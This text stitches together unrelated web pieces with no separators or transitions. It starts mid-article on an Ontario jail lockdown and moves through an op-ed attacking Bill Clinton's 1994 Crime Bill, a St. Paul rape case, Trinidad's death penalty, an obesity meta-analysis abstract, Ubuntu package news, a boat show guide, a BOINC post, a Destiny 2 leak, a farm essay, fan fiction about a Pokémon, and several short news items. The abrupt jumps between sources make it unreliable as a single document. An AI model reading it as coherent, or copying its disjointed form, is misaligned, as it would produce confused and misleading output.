The ministry confirmed that Inmates assaulted three workers last week.
One manager suffered a black eye. She was sent to the hospital and was made to walk back unaccompanied, Mitchell and other officers said. Another inmate broke a manager's jaw. A third spat in the face of an OPP court officer.
Over the past weeks, inmates have "probably accumulated weapons, boreholes and braided ropes," said Jim McCormick, a correction officer at the Barton jail for 24 years.
McCormick has seen it all. Inmates braid ropes with bed sheets, he said, which can be used to strangle officers or bend bars.
Barbed wire and surveillance cameras outside the Barton jail. (Kate Adach/CBC)
"There's no shortage of inventiveness" when it comes to making weapons, McCormick said of the inmates. They can be incredibly violent.
Managers still haven't found the missing metal, he said. When the officers eventually return to work, they will require "a high, high level of security and vigilance."
'Building not searched for two weeks'
Kitchen staff, nurses and maintenance staff have been keeping the officers somewhat in the loop about how the building is running. From their accounts, McCormick said he felt confident "the managers have not searched the building for two weeks."
When officers asked to search for the missing metal three weeks ago, they were told that a full search in protective vests wouldn't be permitted because management "didn't want the building shut down for two days," said Steven Smith, local OPSEU president.
"It would have been locked down area by area for two days," he said. "A small inconvenience for us to go home safe."
Smith shakes his head, confounded by their situation. His uniform, which he and his colleagues have worn daily for their now-routine shift on the front lawn, is unbuttoned. It's hot out and his union members are tired.
Smith doesn't understand why management would reject a two-day lockdown with trained staff in favour of an 18-day lockdown with untrained workers and little resolution in sight.
President Bill Clinton doubled down on his 1994 Crime Bill, pulling back from his recent apology for his role in the over incarceration of young African Americans. Instead, today he labeled this youth in similar fashion to his wife's description 20 years ago, as a type of predator that leads to people being "hopped up on crack." Mass incarceration has largely been the type of stain on the Clinton legacy with Black Americans that doesn't wash out with words. Clinton's bill has left in its wake a trail of devastated African American families cut off from loved ones that have served sentences for nonviolent drug offenses that were decades too long. For former President Bill Clinton to now insinuate that Black Lives Matter protestors are defending murderers and gang leaders, is offensive to a people that have been through so much due to his legislative actions. Yet, here we stand in 2016 hearing the same rhetoric espoused to create the Crime Bill, now being used to justify its abhorrent results. Where as in 1996 Hillary Clinton called young blacks super predators, that is now replaced with Bill Clinton saying,
I don't know how you would characterize the gang leaders who got 13-year-old kids hopped up on crack and sent them out into the street to murder other African American children -- maybe you thought they were good citizens.
Hillary Clinton's statements calling inner city black youth, "super predators who must be brought to heel" was a line of thought built to create unfounded paranoia about urban youth back in the 1990s.
This super predator myth that was debunked long ago is now revived by President Bill Clinton in 2016, recycling the same racial stereotypes. Bill Clinton's attempt to blame African American politicians for the Crime Bill he championed to prove he could be tougher on crime than the Republicans as part of his New Democrat strategy is historically inaccurate. President Clinton, this is your legacy; own it as you do the economic gains Hillary Clinton has touted throughout her campaign. While African American politicians facing communities devastated by the results of Reganomics and the crack epidemic were desperate to deal with violent crime leading to their support of many tough-on-crime measures. They did not foresee the results of your policies, being that large parts of their communities would be placed in prison, and stripped of welfare.
Today there are more African American men incarcerated in the U.S. than the total prison populations in India, Argentina, Canada, Lebanon, Japan, Germany, Finland, Israel and England combined. These nine countries in total represent over 1.5 billion people, in contrast, there are only 18.5 million black males in the United States, counting children.
So what do the Hillary Clinton supporters say now when the mistakes of 20 years ago rush forward, not as a page that has been turned, but rather as a core part of the Clinton ideology on blacks in the ghetto? As a producer of the documentary Freeway Crack in the System, I have seen firsthand how the criminal justice system worked during the crack era. It wasn't unbiased, nor was it fair. It definitely wasn't as simplistic as it was described by President Clinton today. It was actually loaded with agendas, and economics in ways many who were targeted could never imagine.
The epicenter of the incarceration era Clinton referenced in his statement above, roots itself in the crack cocaine epidemic, and mandatory sentencing laws that followed. Yet, to truly look at the era of mass incarceration, we must dig deeper than Gary Webb's accusations in Dark Alliance the expose that brought to light the CIA's involvement in cocaine trafficking. Only by looking at the United States of America with honest eyes, being cognizant of cycles of actions, can we see Gary's tangled web for its true light. Through this analysis of President Clinton's Crime Bill and the like, we are lead to a larger understanding of black America's historical arch in the United States, and a deeper view into how it weaves into the fabric of present day realities. Those realities include the stories of Eric Garner, Mike Brown and so many others that have dealt with the secondary consequences of mass incarceration's hold on our country.
Over the course of three years myself and several other producers took on the task of delving into the War on Drugs and Iran Contra Scandal as we created the film Freeway Crack in the System. Crack in the System was an in-depth detail into how our nation followed this path toward the incarceration of so many in such a short period of time. As a former prosecutor, I have seen the system up close and understand its impact on lives. In this film, we journeyed from the epicenter of the crack epidemic in South Central Los Angeles to the Nicaraguan City that started the domino effect that led to America's cocaine explosion. The connection between the two cities was an administration headed by President Ronald Reagan that,with one hand, turned a blind eye to Nicaraguan drug suppliers trafficking large-scale cocaine in the United States, and with the other reformed the American incarceration landscape with the implementation of harsh crack cocaine sentencing for American citizens who bought and sold some of the same drugs far down the supply line. All of this was done while the government contemporaneously allowed for the privatization of U.S. prisons that would hold this flood of new inmates.
As stated in our film by Eric Sterling, one of the drafters of the Anti Drug Abuse act of 1986, who apologizes on camera for writing some of the most draconian prison sentences ever created for a nonviolent drug offense.
I knew that these laws were a mistake when we were writing them... There is no question that there are tens of thousands of black people in prison serving sentences that are decades excessive... Their families have been destroyed because of laws I played a central role in writing.
According to Sterling these laws were written based on a hysteria created by crack cocaine's imagery in the media. Furthermore, he had not seen a law prior, or since, implemented in such a way. Police agencies were not surveyed, drug scientists were not consulted, this was not a law that was guided by logic. Young blacks were convicted and sentenced based on emotion and fear.
The economic backdrop that set this in motion cannot be ignored. Throughout the two terms of Reagan's presidency, economic advancement declined in urban centers across the country. Decreased access to job opportunities as a result of globalization moving manufacturing jobs to international markets, limited availability of government programs and an implementation of trickle-down economics by Reagan hit African Americans with a devastating impact. This was the frame for the picture that became President Bill Clinton's masterpiece of a Crime Bill. Economic genocide of a community by governmental policy had led to the creation of urban ghettos mired in poverty. President Clinton's claim that black poverty and unemployment declined under his presidency is only partially true, it overlooks the fact that incarcerated people don't count in poverty and unemployment stats. Skyrocketing incarceration rates created a false impression of higher rates of increased employment among black men, by leading those that were incarcerated to be an invisible group behind bars. In addition, the myth that incarceration only increased at the state level fails to deal with the incentives the 1994 Crime Bill created for states to make this action.
So today, as Bill Clinton addressed protestors and screamed into the microphone for them to let him speak, he forgot that the last time we allowed him to speak, it leads to a type of incarceration the modern world has never seen before.
So we rather you did not say as much this time.
An accused serial rapist who terrorized St. Paul's East Side last year has pleaded guilty to sexually assaulting three women. A jury last month convicted him of raping a fourth.
Larry Griffin, 39, entered the pleas earlier this month in Ramsey County District Court, according to court records. He pleaded guilty to three counts of first-degree criminal sexual conduct.
His decision to plead came after a jury in May found Griffin guilty of raping a woman he met along Payne Avenue last year.
The woman was walking alone along the street during an evening last August when Griffin offered to give her a ride. He later took her to an alley, pulled out a gun, and raped her.
Griffin's attorney argued during his trial in that case that it was consensual sex, and that she engaged in it in order to get back at her then-estranged boyfriend.
The jury found otherwise.
Griffin met two of the other three women he later raped along Payne Avenue as well. Those woman were also walking alone when Griffin forced them into his car at gunpoint and raped them, court documents say.
He encountered the fourth woman on Maryland Avenue and offered her a ride home. He later sexually assaulted her after threatening her with a knife, court documents said.
Griffin's attorney, public defender John Riemer, said he had no comment about his client's decision to enter the guilty pleas after previously maintaining his innocence in the cases.
Griffin will be sentenced in the first case next month. He will be sentenced for the additional crimes in August.
In 1999, the last time this coun­try hanged a con­vict­ed killer the mur­der toll for the year was 93. That was the low­est this coun­try's mur­der toll has been for at least the last 23 years, ac­cord­ing to sta­tis­tics.
At the cur­rent rate of mur­ders tak­ing place in this coun­try, we will reach that 1999 toll by Feb­ru­ary–just two months in­to the new year.
With on­ly 28 days of this year gone so far, the mur­der toll in this coun­try has al­ready sur­passed the 1999 halfway mark with more than 50 peo­ple be­ing killed in just 29 days.
"Af­ter we car­ried out the death penal­ty things in Trinidad and To­ba­go were calm every­where, very calm, be­cause it makes a dif­fer­ence to the psy­chol­o­gy of a crim­i­nal if the per­son knows that if he is caught he will be con­vict­ed and if he is con­vict­ed, he will face the death sen­tence. If the crim­i­nals and the po­ten­tial crim­i­nals know that they will get away, they would not be caught or if they are a caught they will still get away, you are not solv­ing crime, you can't solve it," Se­nior Coun­sel Ramesh Lawrence Ma­haraj told the Sun­day Guardian.
Ma­haraj was the at­tor­ney gen­er­al when the last hang­ings in this coun­try took place. An­tho­ny Brig­gs was the last per­son to be hanged.
Brig­gs blud­geoned taxi dri­ver Siew­dath Ramkissoon to death dur­ing a rob­bery in Au­gust 1992. On June 21, 1996, Brig­gs was con­vict­ed of mur­der.
He was ex­e­cut­ed on Ju­ly 28, 1999.
Brig­gs was hanged just over a month af­ter the no­to­ri­ous Dole Chadee gang was hanged over a three-day pe­ri­od.
Dole Chadee, Joey Rami­ah and Ramkelawan Singh were ex­e­cut­ed on June 4, 1999.
While Clive Thomas, Robin Gopaul and Rus­sell Sanker­al­li were hanged on June 5, 1999.
On June 7, 1999 Joel Ram­s­ingh, Steve Ever­s­ley and Bag­wan­deen Singh were hanged.
The Chadee gang were hanged for their in­volve­ment in the mur­der of the Ba­boolal fam­i­ly in 1994.
Hamil­ton Ba­boolal, his moth­er Rook­min, his sis­ter, Mon­i­ca, and his fa­ther, Deo, were all shot dead dur­ing the in­ci­dent.
Ma­haraj said the then Unit­ed Na­tion­al Con­gress gov­ern­ment led by Bas­deo Pan­day had to take de­ci­sive ac­tion to en­sure that the hang­ings could be done.
"First thing first, Trinidad and To­ba­go does not need any law to bring back the death penal­ty, the law is al­ready there, it is in the Of­fences Against the Per­son Act (Chap­ter 11:08 Sec­tion 4) which says that if you com­mit mur­der the penal­ty is death," Ma­haraj said.
How­ev­er, the chal­lenges that the then gov­ern­ment faced were from in­ter­na­tion­al Hu­man Rights or­gan­i­sa­tions and al­so en­sur­ing that all the ex­e­cu­tions were done with­in the time-frame stat­ed in the Pratt and Mor­gan case.
In the Pratt and Mor­gan case the Privy Coun­cil ruled that pro­longed de­lay in car­ry­ing out a sen­tence of death af­ter that sen­tence had been passed could amount to in­hu­man pun­ish­ment. That is five years af­ter the con­vic­tion and sen­tenc­ing.
'The State's ap­pa­ra­tus for fight­ing crime has failed'
Ma­haraj said the UNC saw it as a "strug­gle to car­ry out the wish­es of the peo­ple".
"It was a great chal­lenge but it was done. If we did not do that the Dole Chadee gang could not have been ex­e­cut­ed. They would have been still there," Ma­haraj said.
Ma­haraj said dur­ing the 1995 gen­er­al elec­tion the is­sue of crime was a very im­por­tant part of the po­lit­i­cal agen­da.
In 1989 a Com­mis­sion of En­quiry was chaired by Se­nior Coun­sel El­ton Prescott in­to the death penal­ty.
Ma­haraj said amend­ing any law with re­gard to the death penal­ty would be un­nec­es­sary.
"It makes no sense we go through the process of Par­lia­ment to try to pass a law be­cause it will make things worse be­cause you could then have the con­vict­ed per­son chal­leng­ing the law which will take a longer time," Ma­haraj said.
"So the ques­tion which a Gov­ern­ment has to de­cide in Trinidad and To­ba­go is that if it is felt that the death penal­ty would make a dent in the crime prob­lem they have to take steps to im­ple­ment it with­in the pe­ri­od fixed by the law and it can be done. It has been done and it can be done," he said.
Ma­haraj said the rea­son for the high crime in this coun­try is be­cause "the State's ap­pa­ra­tus for fight­ing crime has failed".
"I think one of the rea­sons for the high mur­der rate in Trinidad and To­ba­go and the high crime rate is that the State ap­pa­ra­tus for fight­ing crime has failed and it leads one to won­der whether there is any se­ri­ous mis­sion to deal with the crime prob­lem," he said.
'We need ac­tion, pas­sion, de­ter­mi­na­tion'
"In or­der to car­ry out the death penal­ty you first have to catch the mur­der­er, if you do not catch the mur­der­er you can­not hang phan­tom peo­ple, so in or­der to catch the mur­der­er you have to im­prove the de­tec­tion ma­chin­ery and you can­not im­prove the de­tec­tion ma­chin­ery to catch the crim­i­nals if you do not have a prop­er foren­sic lab­o­ra­to­ry. And we do not have a prop­er foren­sic lab­o­ra­to­ry in Trinidad and To­ba­go, we do not have the mod­ern tech­nol­o­gy, and we do not use the mod­ern tech­nol­o­gy," he said.
Ma­haraj said the coun­try al­so does not have an ef­fec­tive Wit­ness Pro­tec­tion Pro­gramme in the coun­try. He said a DNA bank al­so needs to be es­tab­lished.
"Here is it in Trinidad and To­ba­go we are deal­ing with a crime prob­lem in the 21st cen­tu­ry but we re­al­ly have 18th cen­tu­ry meth­ods to deal with it," Ma­haraj said.
If some­thing is not done the crime prob­lem will get worse, Ma­haraj warned.
"Trinidad and To­ba­go has to make a de­ci­sion and it is a se­ri­ous de­ci­sion. This crime prob­lem is go­ing to get more un­con­trol­lable un­less se­ri­ous and gen­uine steps are tak­en im­me­di­ate­ly to ar­rest the crime prob­lem. We have to stop us­ing the ex­cuse of we need leg­is­la­tion and law to fight this prob­lem, we do not need more laws, we need ac­tion, we need pas­sion, we need de­ter­mi­na­tion," he said.
Ma­haraj said ev­i­dence of noth­ing be­ing done in this coun­try is that he brought a law in 2000 putting mur­der in­to three cat­e­gories so that the death penal­ty would be re­strict­ed to cer­tain crimes.
"In 2000 I went to the Par­lia­ment, the Sen­ate passed a law, the House of Rep­re­sen­ta­tives passed a law, it was on­ly to be pro­claimed in which mur­der would be cat­e­gorised in­to three cat­e­gories so you re­strict the death penal­ty. Up to to­day, it is not im­ple­ment­ed," he said.
The law brought by Ma­haraj is–Act No 90 of 2000 and is called An Act to amend the Of­fences Against The Per­son (Amend­ment) Act, 2000.
Ma­haraj said the is­sue of cat­e­gori­sa­tion of mur­der may be able to ap­pease pub­lic opin­ion by en­sur­ing that the death penal­ty will be re­strict­ed to the most se­ri­ous crimes.
Background:
The association between eating rate and obesity has recently been reported. However, the findings remain inconclusive.
Objectives:
We undertook a systematic review with a meta-analysis of published epidemiological studies to provide a reliable close estimate of the association between eating rate and obesity.
Methods:
A comprehensive search of MEDLINE, EMBASE and CINAHL was conducted to identify studies that reported quantitative estimates for indices of obesity based on the category of eating rate. Interventional studies or studies conducted using children as subjects were excluded. Two independent researchers extracted the data. A summary estimate was calculated using a random-effects model, and subgroup analyses were conducted to identify sources of heterogeneity.
Results:
Data from 23 published studies were eligible for inclusion. The mean difference in body mass indices (BMIs) between individuals who ate quickly and those who ate slowly was 1.78 kg m−2 (95% confidence interval (CI), 1.53–2.04 kg m−2). The pooled odds ratio of eating quickly on the presence of obesity was 2.15 (95% CI, 1.84–2.51). There was evidence of significant quantitative heterogeneity in the magnitudes of the association across studies (I2=78.4%, P-value for heterogeneity <0.001 for BMI, I2=71.9%, P-value for heterogeneity <0.001 for obesity), which may be partially explained by differences in the type of study population (a weaker association was observed for BMI in diabetic patients).
Conclusions:
Eating quickly is positively associated with excess body weight. Further studies are warranted to determine whether interventions to slow the speed of eating are effective for weight control.
While many believed "aptitude" will soon replace "apt-get" given the fact that it's a lot "smarter", it seems that's not the case in Ubuntu - in fact it's quite the opposite: aptitude has been removed from Ubuntu 10.10 Maverick Meerkat though it is still available in the repositories.
This comes as a surprise, especially since Debian officially endorses aptitude over apt-get.
Update: apparently the reason for this is to free up some 13-14 mb of space from the CD.
There was an attempt to remove aptitude a few releases back, but it was saved by the fact that it didn't take too much space on the CD. But for some unknown reason, the meerkats didn't like aptitude so it was removed from Ubuntu 10.10 as you can see HERE Update: apparently the reason for this is to free up some 13-14 mb of space from the CD.
1 of 9 View Captions
Kim Raff | Tribune file photo U. gymnast Becky Tutka got a perfect 10 on this floor routine at the Huntsman Center last month agai Scott Sommerdorf | The Salt Lake Tribune "I was like an old lady, walking around with this box of pills. … I was always Scott Sommerdorf | The Salt Lake Tribune "I was like an old lady, walking around with this box of pills. … I was always Photo illustration by Francisco Kjolseth | The Salt Lake Tribune Utah gymnast Becky Tutka is no stranger to physical pain. She has Chris Detrick | The Salt Lake Tribune Utah's Corrie Lothrop, shown here at a February meet, is now wearing a boot on her right a Scott Sommerdorf | The Salt Lake Tribune "I was like an old lady, walking around with this box of pills. … I was always Chris Detrick | The Salt Lake Tribune "I've been lucky. I've never been a person who needed to take that much, but there we Trent Nelson | The Salt Lake Tribune "[My gymnasts] know they can come to me or their event coach if they have a concern ab Chris Detrick | The Salt Lake Tribune "I've been lucky. I've never been a person who needed to take that much, but there we
The first Fort Lauderdale boat show began in 1959 and was started by businessmen, boat manufacturers and dealers. The goal was to get Lauderdale on the boating map. Little did they know it would soon be the nation's leading yacht show. At its beginning, there were only 13 exhibitors at the first Ft Lauderdale show. Shortly after, Broward County was added and The Marine industries Association of South Florida was formed. With over 300 miles of beautiful waterways open to water enthusiasts, it was a very necessary to have Broward County be added to the show. Staying safe during this world famous event is serious, as boating activities can be very dangerous.
Today, the Marine Industries Association of South Florida's is the largest marine trade organizations in the Southeast US, and continues to promote boating lifestyles including recreational boating lifestyles from family cruising to fishing and yachts. The 58th annual International Boat Show opens this year Wednesday November 1st and runs through Sunday, November 5th.
Who knew 50 years later this would be the greatest boat show in the world? There are over 1,400 exhibits on display and enough people attending to pack an entire football stadium! This event attracts those from all over the world and it's important with such a big event you know to get ready in advance to ensure you have the best time possible!
Be Prepared:
Valet parking:
Las Olas Marina, 201 South Birch Road, Ft. Lauderdale
General Parking lots:
Holiday Park / War Memorial, 800 NE 8th St $8
Riverside Hotel Garage, 600 E 4th St. $10
Galleria Mall, 2414 E. Sunrise Blvd., $10 Valet
Arrive in Early:
With over 100,000 visitors expected this year, it is best to arrive well before the time the event starts. Not only will traffic be congested, but arriving early will ensure a wonderful spot overlooking the gorgeous yachts. Shuttles will begin taking people to the convention center as early as 9 a.m
Stay Safe:
All bags and purses will be checked upon entrance into the show. Weapons are not permitted anywhere onsite. Security will be enforced strictly at all locations and it's advised that you report any suspicious persons or unattended bags to security on site immediately.
Wear Protection:
The boat show has five distinct show venues in the heart of Fort Lauderdale and even though it is both an indoor and outdoor event, many suggest wearing sunscreen or a hat to keep you from overheating. There is air-conditioned locations in the Broward County Convention Center and the Bahia Yachting Club. Both of these locations also have tents full of marine equipment, engine makers, yacht builders, designers and more.
Show Venue Locations:
Intercoastal Waterway North (on A1A from Seabreeze Blvd. north to Las Olas Blvd.)
•Bahia Mar Yachting Center: 801 Seabreeze Boulevard
•Hall of Fame Marina: 1 Hall of Fame Drive
•Las Olas Marina: 240 E. Las Olas Circle
Intercoastal Waterway South (on 17th Street Causeway from Eisenhower Blvd.)
•Grtr. Fort Lauderdale/Broward County Conv. Center: 1950 Eisenhower Blvd.
•Fort Lauderdale Hilton: 1881 SE 17th Street
•The Sails Marina 2150 SE 17th Street,Ft Lauderdale
•Pier 66 Marina, 2301 SE 17th St, Fort Lauderdale
Have Fun:
Following Hurricane Irma, this event is supposed to bring some of the biggest and best yachts in the world. Buyers and sellers across the globe will be here to sell and to celebrate the wonderful world of yachting. The purpose of this event is not who has the biggest and the best, but to highlight the history of boating and make it fun for the whole family. Recreational boating is an american staple and it's events like the Fort Lauderdale International Boat Show that keep's these traditions afloat.
What is BOINC?
BOINC is an open-source volunteer oriented distributed computing grid. It's free, and harnesses the unused clock cycles from processors and graphics cards to attempt to cure cancer/aids/ebola/malaria, map the milkyway, fold proteins, search for extraterrestrial life, etc.
Currently, there are approx 580,000 active BOINC users & more than 4 million registered accounts. There's serious computing power being untapped at the moment.
IEEE: 2006 - The Computational and Storage Potential of Volunteer Computing
What are some examples of existing BOINC projects?
World Community Grid : Attempting to solve Cancer, Ebola, Malaria, Zika, etc.
SETI@Home : Search for Extraterrestrial Intelligence (SETI).
GPUGRID: Full-atom molecular simulations of proteins
Milkyway@home : Creation of a 3d map of the milkyway galaxy using data gathered by the Sloan Digital Sky Survey. This project enables research in both astroinformatics and computer science.
Examples of more whitelisted projects.
How does Gridcoin benefit BOINC?
The Gridcoin network rewards BOINC volunteers on behalf of the whitelisted BOINC projects. As a result, more computation is pointed at their projects without costing the BOINC project admins a penny.
By comparison, a BOINC project admin would have to fork out serious cash to get an equal level of computing power out of Maidsafe/Golem/etc.
Who can make a BOINC project?
Anyone can create a BOINC project, there's no centralised authority that you are required to consult before creating a BOINC project.
How can I make a BOINC project?
IMO, the easiest method of creating a BOINC project is to use the 'BOINC Server Docker' repo! It takes the majority of manual configuration out of the picture allowing you to focus on customization & the creation of your application/work units.
The developer "Marius Millea" (Cosmology@Home dev) is very active, give him a shout if you run into issues w/ the docker container.
Outdated guides
There are three types of BOINC projects!
Volunteer/non-profit
Commercial/For-Profit
Companies: Use BOINC for desktop Grid computing.
Create a commercial BOINC project, charge customer to process their data and distribute x% to BOINC crunchers & y% to project admins/shareholders.
BOINC DAC (Theoretical)
A "BOINC deentralized autonomous company" is a theoretical extension on the 'Commercial/For-Profit' project type.
Further research&development is required to decentralize the BOINC web server stack.
Existing research (mostly storage decentralization, not 100% decentralized)
BOINC vs Cloud computing platforms
Research papers
TL;DR: (Note - 7 year old statistics!)
In the best-case scenario, hosts register at a rate of 124 cloud nodes per day.
The ratio of volunteer nodes needed to achieve to compute power of a small EC2 instance is about 2.83 active volunteer hosts to 1.
Effectively, with a commercial BOINC project, there exists the opportunity to create a cloud computing service without actually owning/providing the computing capabilities yourself. Imagine creating Azure at a fraction of the cost..
Got an idea for a BOINC project?
Do you have an idea for a potential BOINC project, or do you have questions about either BOINC or Gridcoin? Reply below! You don't need to have the skills to implement the project, we want to hear all ideas! :)
I'll repost your ideas each month afterwards to immortalize the idea until it is created! ;D
Best regards,
CM.
Why is this thread being reposted?
Due to complexities in Steemit's reward mechanism, there is a 30 day maximum window for replying to threads. After 30 days have passed, the thread is effectively archived/dead.
In order to continuously brainstorm possible BOINC projects this thread will be reposted every 30 days.
Past threads
#002
#001
As has become an annual Bungie tradition, a retailer has leaked info on the next big Destiny release. It's not much, but here's your first look at the marketing materials for Destiny 2, a video game that we will no doubt come up with all sorts of pithy ways to describe over the next few years.
And, yes, it's real. We hear Bungie plans to announce Destiny 2 soon. [Correction (12pm): I misread a text and initially thought it'd be today, but that may not be the case. It will be announced soon, though. Apologies for the error.]
The above poster, leaked by an Italian retailer, hints at an upcoming beta. A second leaked poster with the same key art promises that the game will be out on Friday, September 8, although that may only be the European release. (Often, games come out in North America on Tuesday and then in Europe on Friday.) Both posters show three helmet-less humans, one of whom is holding what appears to be a Suros-branded shotgun.
From what we've heard, Destiny 2 aims to feel drastically different than its predecessors in several ways. The plan has long been to build planet regions in Destiny 2 that feel less barren than the ones in Destiny, with towns, outposts, and quests.
We've also heard that, yes, Destiny 2 is coming to PC.
Bungie did not immediately respond to a request for comment.
I'm not much of a drinker, but that doesn't mean there isn't a time and a place for it.
It was true that we hadn't eaten all day. But unless we took all the time we needed, our problems would only multiply.
For me, that would be a dirty martini with Bob on the front deck on Saturday evening, after our farmers' market ends. Since our long market day starts early, Bob is absolved from Saturday evening chores, and time is on our side. We sit together, chat sporadically, listen to Prairie Home Companion, and enjoy the girls' antics, but mostly study the waning light as it illuminates different parts of the forest along the eastern edge of our property. That ritual is followed by the next joy of the night, a roasted chicken dinner, and then by our once-a-week dessert. Saturday night is a celebration we look forward to all week long.
But last Saturday, Mom and Dad were gone on vacation. We had someone come in to do the afternoon chores for us, but the thunderheads on the horizon suggested that there would be a strong downpour sometime in the night, and the chickens would need to be herded into their shelters beforehand.
“Ok, let's do it now,” I urged him, once we'd unpacked from the market, “so we can go home and not come back.”
“No,” he shook his head, grimacing at the skyline. “It's still too hot. We need to wait until dusk.”
I sighed. That meant Saturday martinis would be replaced by herbal tea. But at least we'd get to watch the light from the deck, listen to the radio, and enjoy a good dinner.
But when we got home, we had another surprise waiting for us. A bear had broken through our electric fencing and attacked one of our beehives. Bob madly began trying to reconstruct an ad hoc hive to keep the bees from abandoning the site, while the outraged worker bees took their rage out upon his legs and ankles. I watched briefly from the safety of our screen porch, then set about calling every one of our beekeeping friends and neighbors to find hives and helpful advice.
Carol up at Heather Ridge Farm patiently talked me through the procedure of nailing and strapping the remaining hives closed. We would have to wait until dark. And we couldn't procrastinate. The bear would be back.
The martini was already out of the picture. There went the herbal tea as well. There went the nice dinner. And if we were to be so busy, it wouldn't be worth bothering with dessert, either.
Mark and Lissa down the road had a spare hive they weren't using. Heather next door told me to bring the kids over and she'd watch them while we ran about trying to fix things.
I brought the girls down to Heather's cabin. I apologized for interrupting their Saturday night. She shrugged her shoulders. “Take all the time you need.”
Bob and I drove down to the farm to exchange the car for the pickup before heading out to Mark and Lissa's. Lissa led us through her barn to find all the pieces, then helped us load the hive into the truck.
“We'll try to get this back as soon as possible,” Bob assured her.
“No,” she waved her hand at us. “Take all the time you need.”
By this point, the light was beginning to fade and the intense heat of the day was finally letting up. We drove to the farm to put the chickens in. As we arrived in the back field, we were greeted by the calls of a few evening thrushes, and the sight of contented, happy chickens just settling in for the night. We both sat quietly for a moment in the truck, studying those darkening storm clouds. The impulse was to rush, to rouse the birds and hustle them into their shelters as quickly as possible, to get back to fixing this beehive mess, to get some supper, and to find a way to move our hives out of the danger zone before thunder, lightning, and a return visit from a bear with a sweet tooth.
Time is the most essential ingredient when producing food in a sustainable fashion.
But rushing, in this business, results in further complications and disasters. A bird could be injured or killed, one of us could fall and get hurt, or our nervous energy could just make the livestock unwilling to comply with our herding. We needed that second in the truck to transition, to lose our tension and to stop worrying.
I repeated in my head the words both Heather and Lissa had said: “Take all the time you need.”
I gave thanks that I live in a community where folks understand the nature of growing food.
That's a funny quirk about this business we are in. Urgency comes often in the throes of the growing season, but a panicked response will inevitably create more urgency and, possibly, catastrophes. As we slowly coaxed and scuttled the birds into their shelters for the night, talking softly, moving with care, I thought about the stereotype of the rural farmer—the plodding bloke who speaks slowly, who never seems in a hurry, whose brain function seems moronic when compared to his urban cousin. It was true that we could hear thunder rumbling. It was true that the bear would come back. It was true that we hadn't eaten all day. But unless we took all the time we needed, our problems would only increase in number.
It was a long night. We worked until well after dark, then breathed a sigh of relief once the storm finally rumbled its way into our front field. We trusted that not even a bear would be interested in coming out in thunder and lightning. Bob rigged up lights to shine on the hives and spent the remainder of the night on the screen porch, just to be certain. We slept a few hours, then woke before the sun came up to finish moving the hives.
And in the end, we got it all done. The chickens were safe. The undamaged hives were relocated. The angry workers got a new hive (although they are still inclined to make a punitive sting now and then).
As I reflect over this past weekend, I recognize how time is the most essential ingredient when producing food in a sustainable fashion. But it cannot be saved. It must be taken.
Watches and clocks mean little. So long as something is growing, daylight and weather are the arbiters of the schedule.
As for the martini and the roast chicken and the Saturday night desserts, there will always be next Saturday. And if not, come next winter, we'll make up for it beside the fireplace, when we can take all the time we need.
Read more:
Reddit user DarkArcanine33, or Deviant Artist created a Poodle Moth Fakémon, which inspired me to make a snowy Regional Variant of Volcarona, based on the very same animal. Full props and credit to you!Volcarona: Regional Variant FormType: Bug/FairyHeight: 5'10''Weight: 116.4 lbs.Ability: Tides of the Moon*Pokédex entries:As Volcarona migrated to colder and less sunny environments, their bodies adapted to absorb the light of the moon instead of the sun's light, and grew copious amounts of fluff.The black spots on normal Volcarona wings became large, shining jewels, but their purpose is unknown. If its trainer is feeling cold, it will gladly hug them, and bury them in its fur to keep them warm.*Tides of the Moon: Water and Ice Type attacks used by this Pokémon have boosted power. [roughly 15%]
Chanel Austin, a 36-year-old transgender woman from the Bronx who was held at Rikers Island last spring after being arrested on grand larceny charges, plans to sue New York City for $3 million for transferring her out of the 30-bed transgender housing unit and into an all-male unit.
According to the New York Daily News, inmates in the all-male unit assaulted and harassed Austin—breaking a chair against her back while she was on the phone one day and peeing in her cell another. One man allegedly tried to rape her.
“Her constitutional rights were violated in these instances—because of her gender, this is what she was exposed to,” her lawyer, Matthew Waller, said. Austin filed a $3 million Notice of Claim against the city in July, and Waller said he intends to file suit in federal court later this week.
Austin was transferred after another inmate stole her Walkman, she told the Daily News. “I begged for them to please not move me,” she said. “Tragically, I already knew it was going to be a problem.”
Photo via AP Images. Contact the author of this post: brendan.oconnor@gawker.com.
We're live from Seoul, South Korea, where we've gotten our first look at the Optimus G, the newest flagship Android smartphone from manufacturer LG.
For as important as the hardware is to LG -- 4.7-inch True HD IPS display in a ridiculously thin form factor, quad-core Qualcomm Snapdragon S4 Pro processor at 1.5GHz and a 13 MP camera -- it's the user interface that LG seems to be particularly proud of. There's still no mistaking that you're using an LG phone, as everything fits together just so and seems very much in its place. But at the same time, it's lost a bit of its rigidity.
The phone itself is a slim little wonder. It's decidedly rectangular. But its thinness keeps the lack of sweeping lines a non-issue. The rear of the phone practically shines, thanks to the ultra-reflective design.
The phone's got three capacitive buttons beneath the display (and, oh, what a display it is), done up in the back-home-menu configuration. Again, that sort of flies in the face of what Google intended for Android 4.0 Ice Cream Sandwich and up, but it works well enough here. (And speaking of Ice Cream Sandwich, we can only assume we'll see a Jelly Bean update in the near future, and LG hinted as such, but there's nothing official yet.)
The 2100 mAh battery isn't removable, which continues that trend in smartphone design. We'll have to wait and see about whether that's a real concern, but the Qualcomm Snapdragon S4 Pro should lessen that concern.
We've got a few very quick pics after the break.
Opposition NDP critic Warren McCall said Wednesday the province's billion-dollar deficit is due to mismanagement by the Saskatchewan Party government as the economy dominated debate in the legislature for a second day.
McCall said the government has no plans to get finances back on track, noting the government of Premier Brad Wall is cutting education spending and job training at a time when there are 11,000 more people looking for work.
READ MORE: PotashCorp cuts jobs, production at Cory potash mine
Economy Minister Jeremy Harrison countered that adult basic education has jumped 53 per cent and apprenticeship training funding has risen 76 per cent since 2007.
Wall said lower commodity prices have taken a toll but he opposes NDP-style tax hikes and program cuts.
He defended his record, saying tax cuts have reached $6 billion and there has been a $9 billion hike in infrastructure funding.
Wall said the province has added 150,000 more people since 2007 and the province has the second best job creation record in Canada.
READ MORE: Saskatchewan deficit balloons to $1B with falling resource, tax revenue
The fiscal update released Tuesday by Finance Minister Kevin Doherty showed the deficit is far higher than the $434 million the government projected when it introduced the budget in June.
1 of 8
Rob Carr/Getty Images
At the Pro Bowl, Cousins said he'd be more than happy to play under the franchise tag for the Washington Redskins for the second straight season. Of course, when the second-year franchise tag for quarterbacks amounts to $23.94 million guaranteed, that's an easy assessment to make.
